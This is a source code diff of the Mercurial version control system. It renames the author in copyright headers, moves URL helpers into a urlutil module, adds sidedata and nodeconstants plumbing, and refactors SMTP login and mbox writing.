--- a/mercurial/hgweb/server.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/server.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/server.py - The standalone hg web server.
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -28,6 +28,9 @@
pycompat,
util,
)
+from ..utils import (
+ urlutil,
+)
httpservermod = util.httpserver
socketserver = util.socketserver
@@ -431,7 +434,7 @@
sys.setdefaultencoding(oldenc)
address = ui.config(b'web', b'address')
- port = util.getport(ui.config(b'web', b'port'))
+ port = urlutil.getport(ui.config(b'web', b'port'))
try:
return cls(ui, app, (address, port), handler)
except socket.error as inst:
--- a/mercurial/hgweb/webcommands.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/webcommands.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hgweb/webutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/webutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/webutil.py - utility library for the web interface.
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hook.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hook.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# hook.py - hook support for mercurial
#
-# Copyright 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/httpconnection.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/httpconnection.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# httpconnection.py - urllib2 handler for new http support
#
-# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com>
# Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
# Copyright 2011 Google, Inc.
@@ -18,6 +18,10 @@
pycompat,
util,
)
+from .utils import (
+ urlutil,
+)
+
urlerr = util.urlerr
urlreq = util.urlreq
@@ -99,7 +103,7 @@
if not prefix:
continue
- prefixurl = util.url(prefix)
+ prefixurl = urlutil.url(prefix)
if prefixurl.user and prefixurl.user != user:
# If a username was set in the prefix, it must match the username in
# the URI.
--- a/mercurial/httppeer.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/httppeer.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# httppeer.py - HTTP repository proxy classes for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
@@ -38,6 +38,7 @@
from .utils import (
cborutil,
stringutil,
+ urlutil,
)
httplib = util.httplib
@@ -171,9 +172,9 @@
# Send arguments via HTTP headers.
if headersize > 0:
# The headers can typically carry more data than the URL.
- encargs = urlreq.urlencode(sorted(args.items()))
+ encoded_args = urlreq.urlencode(sorted(args.items()))
for header, value in encodevalueinheaders(
- encargs, b'X-HgArg', headersize
+ encoded_args, b'X-HgArg', headersize
):
headers[header] = value
# Send arguments via query string (Mercurial <1.9).
@@ -305,7 +306,7 @@
except httplib.HTTPException as inst:
ui.debug(
b'http error requesting %s\n'
- % util.hidepassword(req.get_full_url())
+ % urlutil.hidepassword(req.get_full_url())
)
ui.traceback()
raise IOError(None, inst)
@@ -352,14 +353,14 @@
except AttributeError:
proto = pycompat.bytesurl(resp.headers.get('content-type', ''))
- safeurl = util.hidepassword(baseurl)
+ safeurl = urlutil.hidepassword(baseurl)
if proto.startswith(b'application/hg-error'):
raise error.OutOfBandError(resp.read())
# Pre 1.0 versions of Mercurial used text/plain and
# application/hg-changegroup. We don't support such old servers.
if not proto.startswith(b'application/mercurial-'):
- ui.debug(b"requested URL: '%s'\n" % util.hidepassword(requrl))
+ ui.debug(b"requested URL: '%s'\n" % urlutil.hidepassword(requrl))
msg = _(
b"'%s' does not appear to be an hg repository:\n"
b"---%%<--- (%s)\n%s\n---%%<---\n"
@@ -1058,7 +1059,7 @@
``requestbuilder`` is the type used for constructing HTTP requests.
It exists as an argument so extensions can override the default.
"""
- u = util.url(path)
+ u = urlutil.url(path)
if u.query or u.fragment:
raise error.Abort(
_(b'unsupported URL component: "%s"') % (u.query or u.fragment)
--- a/mercurial/i18n.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/i18n.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# i18n.py - internationalization support for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -19,6 +19,13 @@
pycompat,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Callable,
+ List,
+ )
+
+
# modelled after templater.templatepath:
if getattr(sys, 'frozen', None) is not None:
module = pycompat.sysexecutable
@@ -40,7 +47,10 @@
try:
import ctypes
+ # pytype: disable=module-attr
langid = ctypes.windll.kernel32.GetUserDefaultUILanguage()
+ # pytype: enable=module-attr
+
_languages = [locale.windows_locale[langid]]
except (ImportError, AttributeError, KeyError):
# ctypes not found or unknown langid
@@ -51,7 +61,7 @@
localedir = os.path.join(datapath, 'locale')
t = gettextmod.translation('hg', localedir, _languages, fallback=True)
try:
- _ugettext = t.ugettext
+ _ugettext = t.ugettext # pytype: disable=attribute-error
except AttributeError:
_ugettext = t.gettext
@@ -60,6 +70,7 @@
def gettext(message):
+ # type: (bytes) -> bytes
"""Translate message.
The message is looked up in the catalog to get a Unicode string,
@@ -77,7 +88,7 @@
if message not in cache:
if type(message) is pycompat.unicode:
# goofy unicode docstrings in test
- paragraphs = message.split(u'\n\n')
+ paragraphs = message.split(u'\n\n') # type: List[pycompat.unicode]
else:
# should be ascii, but we have unicode docstrings in test, which
# are converted to utf-8 bytes on Python 3.
@@ -110,6 +121,6 @@
if _plain():
- _ = lambda message: message
+ _ = lambda message: message # type: Callable[[bytes], bytes]
else:
_ = gettext
--- a/mercurial/interfaces/dirstate.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/interfaces/dirstate.py Tue Apr 20 11:01:06 2021 -0400
@@ -8,7 +8,7 @@
class idirstate(interfaceutil.Interface):
- def __init__(opener, ui, root, validate, sparsematchfn):
+ def __init__(opener, ui, root, validate, sparsematchfn, nodeconstants):
"""Create a new dirstate object.
opener is an open()-like callable that can be used to open the
--- a/mercurial/interfaces/repository.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/interfaces/repository.py Tue Apr 20 11:01:06 2021 -0400
@@ -453,6 +453,10 @@
"""
)
+ sidedata = interfaceutil.Attribute(
+ """Raw sidedata bytes for the given revision."""
+ )
+
class ifilerevisionssequence(interfaceutil.Interface):
"""Contains index data for all revisions of a file.
@@ -519,6 +523,10 @@
* Metadata to facilitate storage.
"""
+ nullid = interfaceutil.Attribute(
+ """node for the null revision for use as delta base."""
+ )
+
def __len__():
"""Obtain the number of revisions stored for this file."""
@@ -734,7 +742,7 @@
flags=0,
cachedelta=None,
):
- """Add a new revision to the store.
+ """Add a new revision to the store and return its number.
This is similar to ``add()`` except it operates at a lower level.
@@ -769,7 +777,14 @@
``nullid``, in which case the header from the delta can be ignored
and the delta used as the fulltext.
- ``addrevisioncb`` should be called for each node as it is committed.
+ ``alwayscache`` instructs the lower layers to cache the content of the
+ newly added revision, even if it needs to be explicitly computed.
+ This used to be the default when ``addrevisioncb`` was provided up to
+ Mercurial 5.8.
+
+ ``addrevisioncb`` should be called for each new rev as it is committed.
+ ``duplicaterevisioncb`` should be called for all revs with a
+ pre-existing node.
``maybemissingparents`` is a bool indicating whether the incoming
data may reference parents/ancestor revisions that aren't present.
@@ -1132,6 +1147,10 @@
class imanifeststorage(interfaceutil.Interface):
"""Storage interface for manifest data."""
+ nodeconstants = interfaceutil.Attribute(
+ """nodeconstants used by the current repository."""
+ )
+
tree = interfaceutil.Attribute(
"""The path to the directory this manifest tracks.
@@ -1355,6 +1374,10 @@
tree manifests.
"""
+ nodeconstants = interfaceutil.Attribute(
+ """nodeconstants used by the current repository."""
+ )
+
def __getitem__(node):
"""Obtain a manifest instance for a given binary node.
@@ -1423,6 +1446,13 @@
This currently captures the reality of things - not how things should be.
"""
+ nodeconstants = interfaceutil.Attribute(
+ """Constant nodes matching the hash function used by the repository."""
+ )
+ nullid = interfaceutil.Attribute(
+ """null revision for the hash function used by the repository."""
+ )
+
supportedformats = interfaceutil.Attribute(
"""Set of requirements that apply to stream clone.
@@ -1641,6 +1671,14 @@
def revbranchcache():
pass
+ def register_changeset(rev, changelogrevision):
+ """Extension point for caches for new nodes.
+
+ Multiple consumers are expected to need parts of the changelogrevision,
+ so it is provided as optimization to avoid duplicate lookups. A simple
+ cache would be fragile when other revisions are accessed, too."""
+ pass
+
def branchtip(branchtip, ignoremissing=False):
"""Return the tip node for a given branch."""
@@ -1813,6 +1851,12 @@
def savecommitmessage(text):
pass
+ def register_sidedata_computer(kind, category, keys, computer):
+ pass
+
+ def register_wanted_sidedata(category):
+ pass
+
class completelocalrepository(
ilocalrepositorymain, ilocalrepositoryfilestorage
--- a/mercurial/localrepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/localrepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# localrepo.py - read/write repository class for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -21,6 +21,7 @@
hex,
nullid,
nullrev,
+ sha1nodeconstants,
short,
)
from .pycompat import (
@@ -49,6 +50,7 @@
match as matchmod,
mergestate as mergestatemod,
mergeutil,
+ metadata as metadatamod,
namespaces,
narrowspec,
obsolete,
@@ -71,6 +73,7 @@
txnutil,
util,
vfs as vfsmod,
+ wireprototypes,
)
from .interfaces import (
@@ -82,9 +85,13 @@
hashutil,
procutil,
stringutil,
+ urlutil,
)
-from .revlogutils import constants as revlogconst
+from .revlogutils import (
+ concurrency_checker as revlogchecker,
+ constants as revlogconst,
+)
release = lockmod.release
urlerr = util.urlerr
@@ -270,6 +277,11 @@
caps = moderncaps.copy()
self._repo = repo.filtered(b'served')
self.ui = repo.ui
+
+ if repo._wanted_sidedata:
+ formatted = bundle2.format_remote_wanted_sidedata(repo)
+ caps.add(b'exp-wanted-sidedata=' + formatted)
+
self._caps = repo._restrictcapabilities(caps)
# Begin of _basepeer interface.
@@ -313,7 +325,13 @@
)
def getbundle(
- self, source, heads=None, common=None, bundlecaps=None, **kwargs
+ self,
+ source,
+ heads=None,
+ common=None,
+ bundlecaps=None,
+ remote_sidedata=None,
+ **kwargs
):
chunks = exchange.getbundlechunks(
self._repo,
@@ -321,6 +339,7 @@
heads=heads,
common=common,
bundlecaps=bundlecaps,
+ remote_sidedata=remote_sidedata,
**kwargs
)[1]
cb = util.chunkbuffer(chunks)
@@ -452,7 +471,7 @@
# ``.hg/`` for ``relshared``.
sharedpath = hgvfs.read(b'sharedpath').rstrip(b'\n')
if requirementsmod.RELATIVE_SHARED_REQUIREMENT in requirements:
- sharedpath = hgvfs.join(sharedpath)
+ sharedpath = util.normpath(hgvfs.join(sharedpath))
sharedvfs = vfsmod.vfs(sharedpath, realpath=True)
@@ -939,11 +958,10 @@
def makestore(requirements, path, vfstype):
"""Construct a storage object for a repository."""
- if b'store' in requirements:
- if b'fncache' in requirements:
- return storemod.fncachestore(
- path, vfstype, b'dotencode' in requirements
- )
+ if requirementsmod.STORE_REQUIREMENT in requirements:
+ if requirementsmod.FNCACHE_REQUIREMENT in requirements:
+ dotencode = requirementsmod.DOTENCODE_REQUIREMENT in requirements
+ return storemod.fncachestore(path, vfstype, dotencode)
return storemod.encodedstore(path, vfstype)
@@ -971,7 +989,7 @@
# opener options for it because those options wouldn't do anything
# meaningful on such old repos.
if (
- b'revlogv1' in requirements
+ requirementsmod.REVLOGV1_REQUIREMENT in requirements
or requirementsmod.REVLOGV2_REQUIREMENT in requirements
):
options.update(resolverevlogstorevfsoptions(ui, requirements, features))
@@ -995,12 +1013,12 @@
options = {}
options[b'flagprocessors'] = {}
- if b'revlogv1' in requirements:
+ if requirementsmod.REVLOGV1_REQUIREMENT in requirements:
options[b'revlogv1'] = True
if requirementsmod.REVLOGV2_REQUIREMENT in requirements:
options[b'revlogv2'] = True
- if b'generaldelta' in requirements:
+ if requirementsmod.GENERALDELTA_REQUIREMENT in requirements:
options[b'generaldelta'] = True
# experimental config: format.chunkcachesize
@@ -1196,8 +1214,8 @@
# being successful (repository sizes went up due to worse delta
# chains), and the code was deleted in 4.6.
supportedformats = {
- b'revlogv1',
- b'generaldelta',
+ requirementsmod.REVLOGV1_REQUIREMENT,
+ requirementsmod.GENERALDELTA_REQUIREMENT,
requirementsmod.TREEMANIFEST_REQUIREMENT,
requirementsmod.COPIESSDC_REQUIREMENT,
requirementsmod.REVLOGV2_REQUIREMENT,
@@ -1208,11 +1226,11 @@
requirementsmod.SHARESAFE_REQUIREMENT,
}
_basesupported = supportedformats | {
- b'store',
- b'fncache',
+ requirementsmod.STORE_REQUIREMENT,
+ requirementsmod.FNCACHE_REQUIREMENT,
requirementsmod.SHARED_REQUIREMENT,
requirementsmod.RELATIVE_SHARED_REQUIREMENT,
- b'dotencode',
+ requirementsmod.DOTENCODE_REQUIREMENT,
requirementsmod.SPARSE_REQUIREMENT,
requirementsmod.INTERNAL_PHASE_REQUIREMENT,
}
@@ -1315,6 +1333,8 @@
self.vfs = hgvfs
self.path = hgvfs.base
self.requirements = requirements
+ self.nodeconstants = sha1nodeconstants
+ self.nullid = self.nodeconstants.nullid
self.supported = supportedrequirements
self.sharedpath = sharedpath
self.store = store
@@ -1386,6 +1406,10 @@
if requirementsmod.COPIESSDC_REQUIREMENT in self.requirements:
self.filecopiesmode = b'changeset-sidedata'
+ self._wanted_sidedata = set()
+ self._sidedata_computers = {}
+ metadatamod.set_sidedata_spec_for_repo(self)
+
def _getvfsward(self, origfunc):
"""build a ward for self.vfs"""
rref = weakref.ref(self)
@@ -1473,6 +1497,8 @@
bundle2.getrepocaps(self, role=b'client')
)
caps.add(b'bundle2=' + urlreq.quote(capsblob))
+ if self.ui.configbool(b'experimental', b'narrow'):
+ caps.add(wireprototypes.NARROWCAP)
return caps
# Don't cache auditor/nofsauditor, or you'll end up with reference cycle:
@@ -1639,7 +1665,10 @@
def changelog(self):
# load dirstate before changelog to avoid race see issue6303
self.dirstate.prefetch_parents()
- return self.store.changelog(txnutil.mayhavepending(self.root))
+ return self.store.changelog(
+ txnutil.mayhavepending(self.root),
+ concurrencychecker=revlogchecker.get_checker(self.ui, b'changelog'),
+ )
@storecache(b'00manifest.i')
def manifestlog(self):
@@ -1654,7 +1683,12 @@
sparsematchfn = lambda: sparse.matcher(self)
return dirstate.dirstate(
- self.vfs, self.ui, self.root, self._dirstatevalidate, sparsematchfn
+ self.vfs,
+ self.ui,
+ self.root,
+ self._dirstatevalidate,
+ sparsematchfn,
+ self.nodeconstants,
)
def _dirstatevalidate(self, node):
@@ -2059,6 +2093,9 @@
self._revbranchcache = branchmap.revbranchcache(self.unfiltered())
return self._revbranchcache
+ def register_changeset(self, rev, changelogrevision):
+ self.revbranchcache().setdata(rev, changelogrevision)
+
def branchtip(self, branch, ignoremissing=False):
"""return the tip node for a given branch
@@ -3326,6 +3363,22 @@
fp.close()
return self.pathto(fp.name[len(self.root) + 1 :])
+ def register_wanted_sidedata(self, category):
+ self._wanted_sidedata.add(pycompat.bytestr(category))
+
+ def register_sidedata_computer(self, kind, category, keys, computer):
+ if kind not in (b"changelog", b"manifest", b"filelog"):
+ msg = _(b"unexpected revlog kind '%s'.")
+ raise error.ProgrammingError(msg % kind)
+ category = pycompat.bytestr(category)
+ if category in self._sidedata_computers.get(kind, []):
+ msg = _(
+ b"cannot register a sidedata computer twice for category '%s'."
+ )
+ raise error.ProgrammingError(msg % category)
+ self._sidedata_computers.setdefault(kind, {})
+ self._sidedata_computers[kind][category] = (keys, computer)
+
# used to avoid circular references so destructors work
def aftertrans(files):
@@ -3352,7 +3405,7 @@
def instance(ui, path, create, intents=None, createopts=None):
- localpath = util.urllocalpath(path)
+ localpath = urlutil.urllocalpath(path)
if create:
createrepository(ui, localpath, createopts=createopts)
@@ -3410,18 +3463,20 @@
% createopts[b'backend']
)
- requirements = {b'revlogv1'}
+ requirements = {requirementsmod.REVLOGV1_REQUIREMENT}
if ui.configbool(b'format', b'usestore'):
- requirements.add(b'store')
+ requirements.add(requirementsmod.STORE_REQUIREMENT)
if ui.configbool(b'format', b'usefncache'):
- requirements.add(b'fncache')
+ requirements.add(requirementsmod.FNCACHE_REQUIREMENT)
if ui.configbool(b'format', b'dotencode'):
- requirements.add(b'dotencode')
+ requirements.add(requirementsmod.DOTENCODE_REQUIREMENT)
compengines = ui.configlist(b'format', b'revlog-compression')
for compengine in compengines:
if compengine in util.compengines:
- break
+ engine = util.compengines[compengine]
+ if engine.available() and engine.revlogheader():
+ break
else:
raise error.Abort(
_(
@@ -3442,15 +3497,19 @@
requirements.add(b'exp-compression-%s' % compengine)
if scmutil.gdinitconfig(ui):
- requirements.add(b'generaldelta')
+ requirements.add(requirementsmod.GENERALDELTA_REQUIREMENT)
if ui.configbool(b'format', b'sparse-revlog'):
requirements.add(requirementsmod.SPARSEREVLOG_REQUIREMENT)
# experimental config: format.exp-use-side-data
if ui.configbool(b'format', b'exp-use-side-data'):
+ requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT)
+ requirements.add(requirementsmod.REVLOGV2_REQUIREMENT)
requirements.add(requirementsmod.SIDEDATA_REQUIREMENT)
# experimental config: format.exp-use-copies-side-data-changeset
if ui.configbool(b'format', b'exp-use-copies-side-data-changeset'):
+ requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT)
+ requirements.add(requirementsmod.REVLOGV2_REQUIREMENT)
requirements.add(requirementsmod.SIDEDATA_REQUIREMENT)
requirements.add(requirementsmod.COPIESSDC_REQUIREMENT)
if ui.configbool(b'experimental', b'treemanifest'):
@@ -3458,9 +3517,9 @@
revlogv2 = ui.config(b'experimental', b'revlogv2')
if revlogv2 == b'enable-unstable-format-and-corrupt-my-data':
- requirements.remove(b'revlogv1')
+ requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT)
# generaldelta is implied by revlogv2.
- requirements.discard(b'generaldelta')
+ requirements.discard(requirementsmod.GENERALDELTA_REQUIREMENT)
requirements.add(requirementsmod.REVLOGV2_REQUIREMENT)
# experimental config: format.internal-phase
if ui.configbool(b'format', b'internal-phase'):
@@ -3494,7 +3553,7 @@
dropped = set()
- if b'store' not in requirements:
+ if requirementsmod.STORE_REQUIREMENT not in requirements:
if bookmarks.BOOKMARKS_IN_STORE_REQUIREMENT in requirements:
ui.warn(
_(
@@ -3617,6 +3676,7 @@
if createopts.get(b'sharedrelative'):
try:
sharedpath = os.path.relpath(sharedpath, hgvfs.base)
+ sharedpath = util.pconvert(sharedpath)
except (IOError, ValueError) as e:
# ValueError is raised on Windows if the drive letters differ
# on each path.
@@ -3633,7 +3693,8 @@
hgvfs.mkdir(b'cache')
hgvfs.mkdir(b'wcache')
- if b'store' in requirements and b'sharedrepo' not in createopts:
+ has_store = requirementsmod.STORE_REQUIREMENT in requirements
+ if has_store and b'sharedrepo' not in createopts:
hgvfs.mkdir(b'store')
# We create an invalid changelog outside the store so very old
@@ -3642,11 +3703,11 @@
# effectively locks out old clients and prevents them from
# mucking with a repo in an unknown format.
#
- # The revlog header has version 2, which won't be recognized by
+ # The revlog header has version 65535, which won't be recognized by
# such old clients.
hgvfs.append(
b'00changelog.i',
- b'\0\0\0\2 dummy changelog to prevent using the old repo '
+ b'\0\0\xFF\xFF dummy changelog to prevent using the old repo '
b'layout',
)
--- a/mercurial/lock.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/lock.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# lock.py - simple advisory locking scheme for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/logcmdutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/logcmdutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# logcmdutil.py - utility for log-like commands
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -14,6 +14,7 @@
from .i18n import _
from .node import (
nullid,
+ nullrev,
wdirid,
wdirrev,
)
@@ -27,6 +28,7 @@
graphmod,
match as matchmod,
mdiff,
+ merge,
patch,
pathutil,
pycompat,
@@ -74,6 +76,36 @@
return limit
+def diff_parent(ctx):
+ """get the context object to use as parent when diffing
+
+
+ If diff.merge is enabled, an overlayworkingctx of the auto-merged parents will be returned.
+ """
+ repo = ctx.repo()
+ if repo.ui.configbool(b"diff", b"merge") and ctx.p2().rev() != nullrev:
+ # avoid cycle context -> subrepo -> cmdutil -> logcmdutil
+ from . import context
+
+ wctx = context.overlayworkingctx(repo)
+ wctx.setbase(ctx.p1())
+ with repo.ui.configoverride(
+ {
+ (
+ b"ui",
+ b"forcemerge",
+ ): b"internal:merge3-lie-about-conflicts",
+ },
+ b"merge-diff",
+ ):
+ repo.ui.pushbuffer()
+ merge.merge(ctx.p2(), wc=wctx)
+ repo.ui.popbuffer()
+ return wctx
+ else:
+ return ctx.p1()
+
+
def diffordiffstat(
ui,
repo,
@@ -217,7 +249,7 @@
ui,
ctx.repo(),
diffopts,
- ctx.p1(),
+ diff_parent(ctx),
ctx,
match=self._makefilematcher(ctx),
stat=stat,
--- a/mercurial/logexchange.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/logexchange.py Tue Apr 20 11:01:06 2021 -0400
@@ -15,6 +15,9 @@
util,
vfs as vfsmod,
)
+from .utils import (
+ urlutil,
+)
# directory name in .hg/ in which remotenames files will be present
remotenamedir = b'logexchange'
@@ -117,7 +120,7 @@
# represent the remotepath with user defined path name if exists
for path, url in repo.ui.configitems(b'paths'):
# remove auth info from user defined url
- noauthurl = util.removeauth(url)
+ noauthurl = urlutil.removeauth(url)
# Standardize on unix style paths, otherwise some {remotenames} end up
# being an absolute path on Windows.
--- a/mercurial/loggingutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/loggingutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -10,7 +10,10 @@
import errno
-from . import pycompat
+from . import (
+ encoding,
+ pycompat,
+)
from .utils import (
dateutil,
@@ -32,7 +35,7 @@
if err.errno != errno.ENOENT:
ui.debug(
b"warning: cannot remove '%s': %s\n"
- % (newpath, err.strerror)
+ % (newpath, encoding.strtolocal(err.strerror))
)
try:
if newpath:
@@ -41,7 +44,7 @@
if err.errno != errno.ENOENT:
ui.debug(
b"warning: cannot rename '%s' to '%s': %s\n"
- % (newpath, oldpath, err.strerror)
+ % (newpath, oldpath, encoding.strtolocal(err.strerror))
)
if maxsize > 0:
--- a/mercurial/mail.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/mail.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# mail.py - mail sending bits for mercurial
#
-# Copyright 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -34,6 +34,7 @@
from .utils import (
procutil,
stringutil,
+ urlutil,
)
if pycompat.TYPE_CHECKING:
@@ -139,7 +140,7 @@
defaultport = 465
else:
defaultport = 25
- mailport = util.getport(ui.config(b'smtp', b'port', defaultport))
+ mailport = urlutil.getport(ui.config(b'smtp', b'port', defaultport))
ui.note(_(b'sending mail: smtp host %s, port %d\n') % (mailhost, mailport))
s.connect(host=mailhost, port=mailport)
if starttls:
@@ -150,6 +151,32 @@
if starttls or smtps:
ui.note(_(b'(verifying remote certificate)\n'))
sslutil.validatesocket(s.sock)
+
+ try:
+ _smtp_login(ui, s, mailhost, mailport)
+ except smtplib.SMTPException as inst:
+ raise error.Abort(stringutil.forcebytestr(inst))
+
+ def send(sender, recipients, msg):
+ try:
+ return s.sendmail(sender, recipients, msg)
+ except smtplib.SMTPRecipientsRefused as inst:
+ recipients = [r[1] for r in inst.recipients.values()]
+ raise error.Abort(b'\n' + b'\n'.join(recipients))
+ except smtplib.SMTPException as inst:
+ raise error.Abort(stringutil.forcebytestr(inst))
+
+ return send
+
+
+def _smtp_login(ui, smtp, mailhost, mailport):
+ """A hook for the keyring extension to perform the actual SMTP login.
+
+ An already connected SMTP object of the proper type is provided, based on
+ the current configuration. The host and port to which the connection was
+ established are provided for accessibility, since the SMTP object doesn't
+ provide an accessor. ``smtplib.SMTPException`` is raised on error.
+ """
username = ui.config(b'smtp', b'username')
password = ui.config(b'smtp', b'password')
if username:
@@ -162,21 +189,7 @@
if username and password:
ui.note(_(b'(authenticating to mail server as %s)\n') % username)
username = encoding.strfromlocal(username)
- try:
- s.login(username, password)
- except smtplib.SMTPException as inst:
- raise error.Abort(stringutil.forcebytestr(inst))
-
- def send(sender, recipients, msg):
- try:
- return s.sendmail(sender, recipients, msg)
- except smtplib.SMTPRecipientsRefused as inst:
- recipients = [r[1] for r in inst.recipients.values()]
- raise error.Abort(b'\n' + b'\n'.join(recipients))
- except smtplib.SMTPException as inst:
- raise error.Abort(inst)
-
- return send
+ smtp.login(username, password)
def _sendmail(ui, sender, recipients, msg):
@@ -207,17 +220,16 @@
def _mbox(mbox, sender, recipients, msg):
'''write mails to mbox'''
- fp = open(mbox, b'ab+')
- # Should be time.asctime(), but Windows prints 2-characters day
- # of month instead of one. Make them print the same thing.
- date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime())
- fp.write(
- b'From %s %s\n'
- % (encoding.strtolocal(sender), encoding.strtolocal(date))
- )
- fp.write(msg)
- fp.write(b'\n\n')
- fp.close()
+ with open(mbox, b'ab+') as fp:
+ # Should be time.asctime(), but Windows prints 2-characters day
+ # of month instead of one. Make them print the same thing.
+ date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime())
+ fp.write(
+ b'From %s %s\n'
+ % (encoding.strtolocal(sender), encoding.strtolocal(date))
+ )
+ fp.write(msg)
+ fp.write(b'\n\n')
def connect(ui, mbox=None):
--- a/mercurial/manifest.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/manifest.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# manifest.py - manifest revision class for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -792,8 +792,9 @@
@interfaceutil.implementer(repository.imanifestdict)
class treemanifest(object):
- def __init__(self, dir=b'', text=b''):
+ def __init__(self, nodeconstants, dir=b'', text=b''):
self._dir = dir
+ self.nodeconstants = nodeconstants
self._node = nullid
self._loadfunc = _noop
self._copyfunc = _noop
@@ -1051,7 +1052,9 @@
if dir:
self._loadlazy(dir)
if dir not in self._dirs:
- self._dirs[dir] = treemanifest(self._subpath(dir))
+ self._dirs[dir] = treemanifest(
+ self.nodeconstants, self._subpath(dir)
+ )
self._dirs[dir].__setitem__(subpath, n)
else:
# manifest nodes are either 20 bytes or 32 bytes,
@@ -1078,14 +1081,16 @@
if dir:
self._loadlazy(dir)
if dir not in self._dirs:
- self._dirs[dir] = treemanifest(self._subpath(dir))
+ self._dirs[dir] = treemanifest(
+ self.nodeconstants, self._subpath(dir)
+ )
self._dirs[dir].setflag(subpath, flags)
else:
self._flags[f] = flags
self._dirty = True
def copy(self):
- copy = treemanifest(self._dir)
+ copy = treemanifest(self.nodeconstants, self._dir)
copy._node = self._node
copy._dirty = self._dirty
if self._copyfunc is _noop:
@@ -1215,7 +1220,7 @@
visit = match.visitchildrenset(self._dir[:-1])
if visit == b'all':
return self.copy()
- ret = treemanifest(self._dir)
+ ret = treemanifest(self.nodeconstants, self._dir)
if not visit:
return ret
@@ -1272,7 +1277,7 @@
m2 = m2._matches(match)
return m1.diff(m2, clean=clean)
result = {}
- emptytree = treemanifest()
+ emptytree = treemanifest(self.nodeconstants)
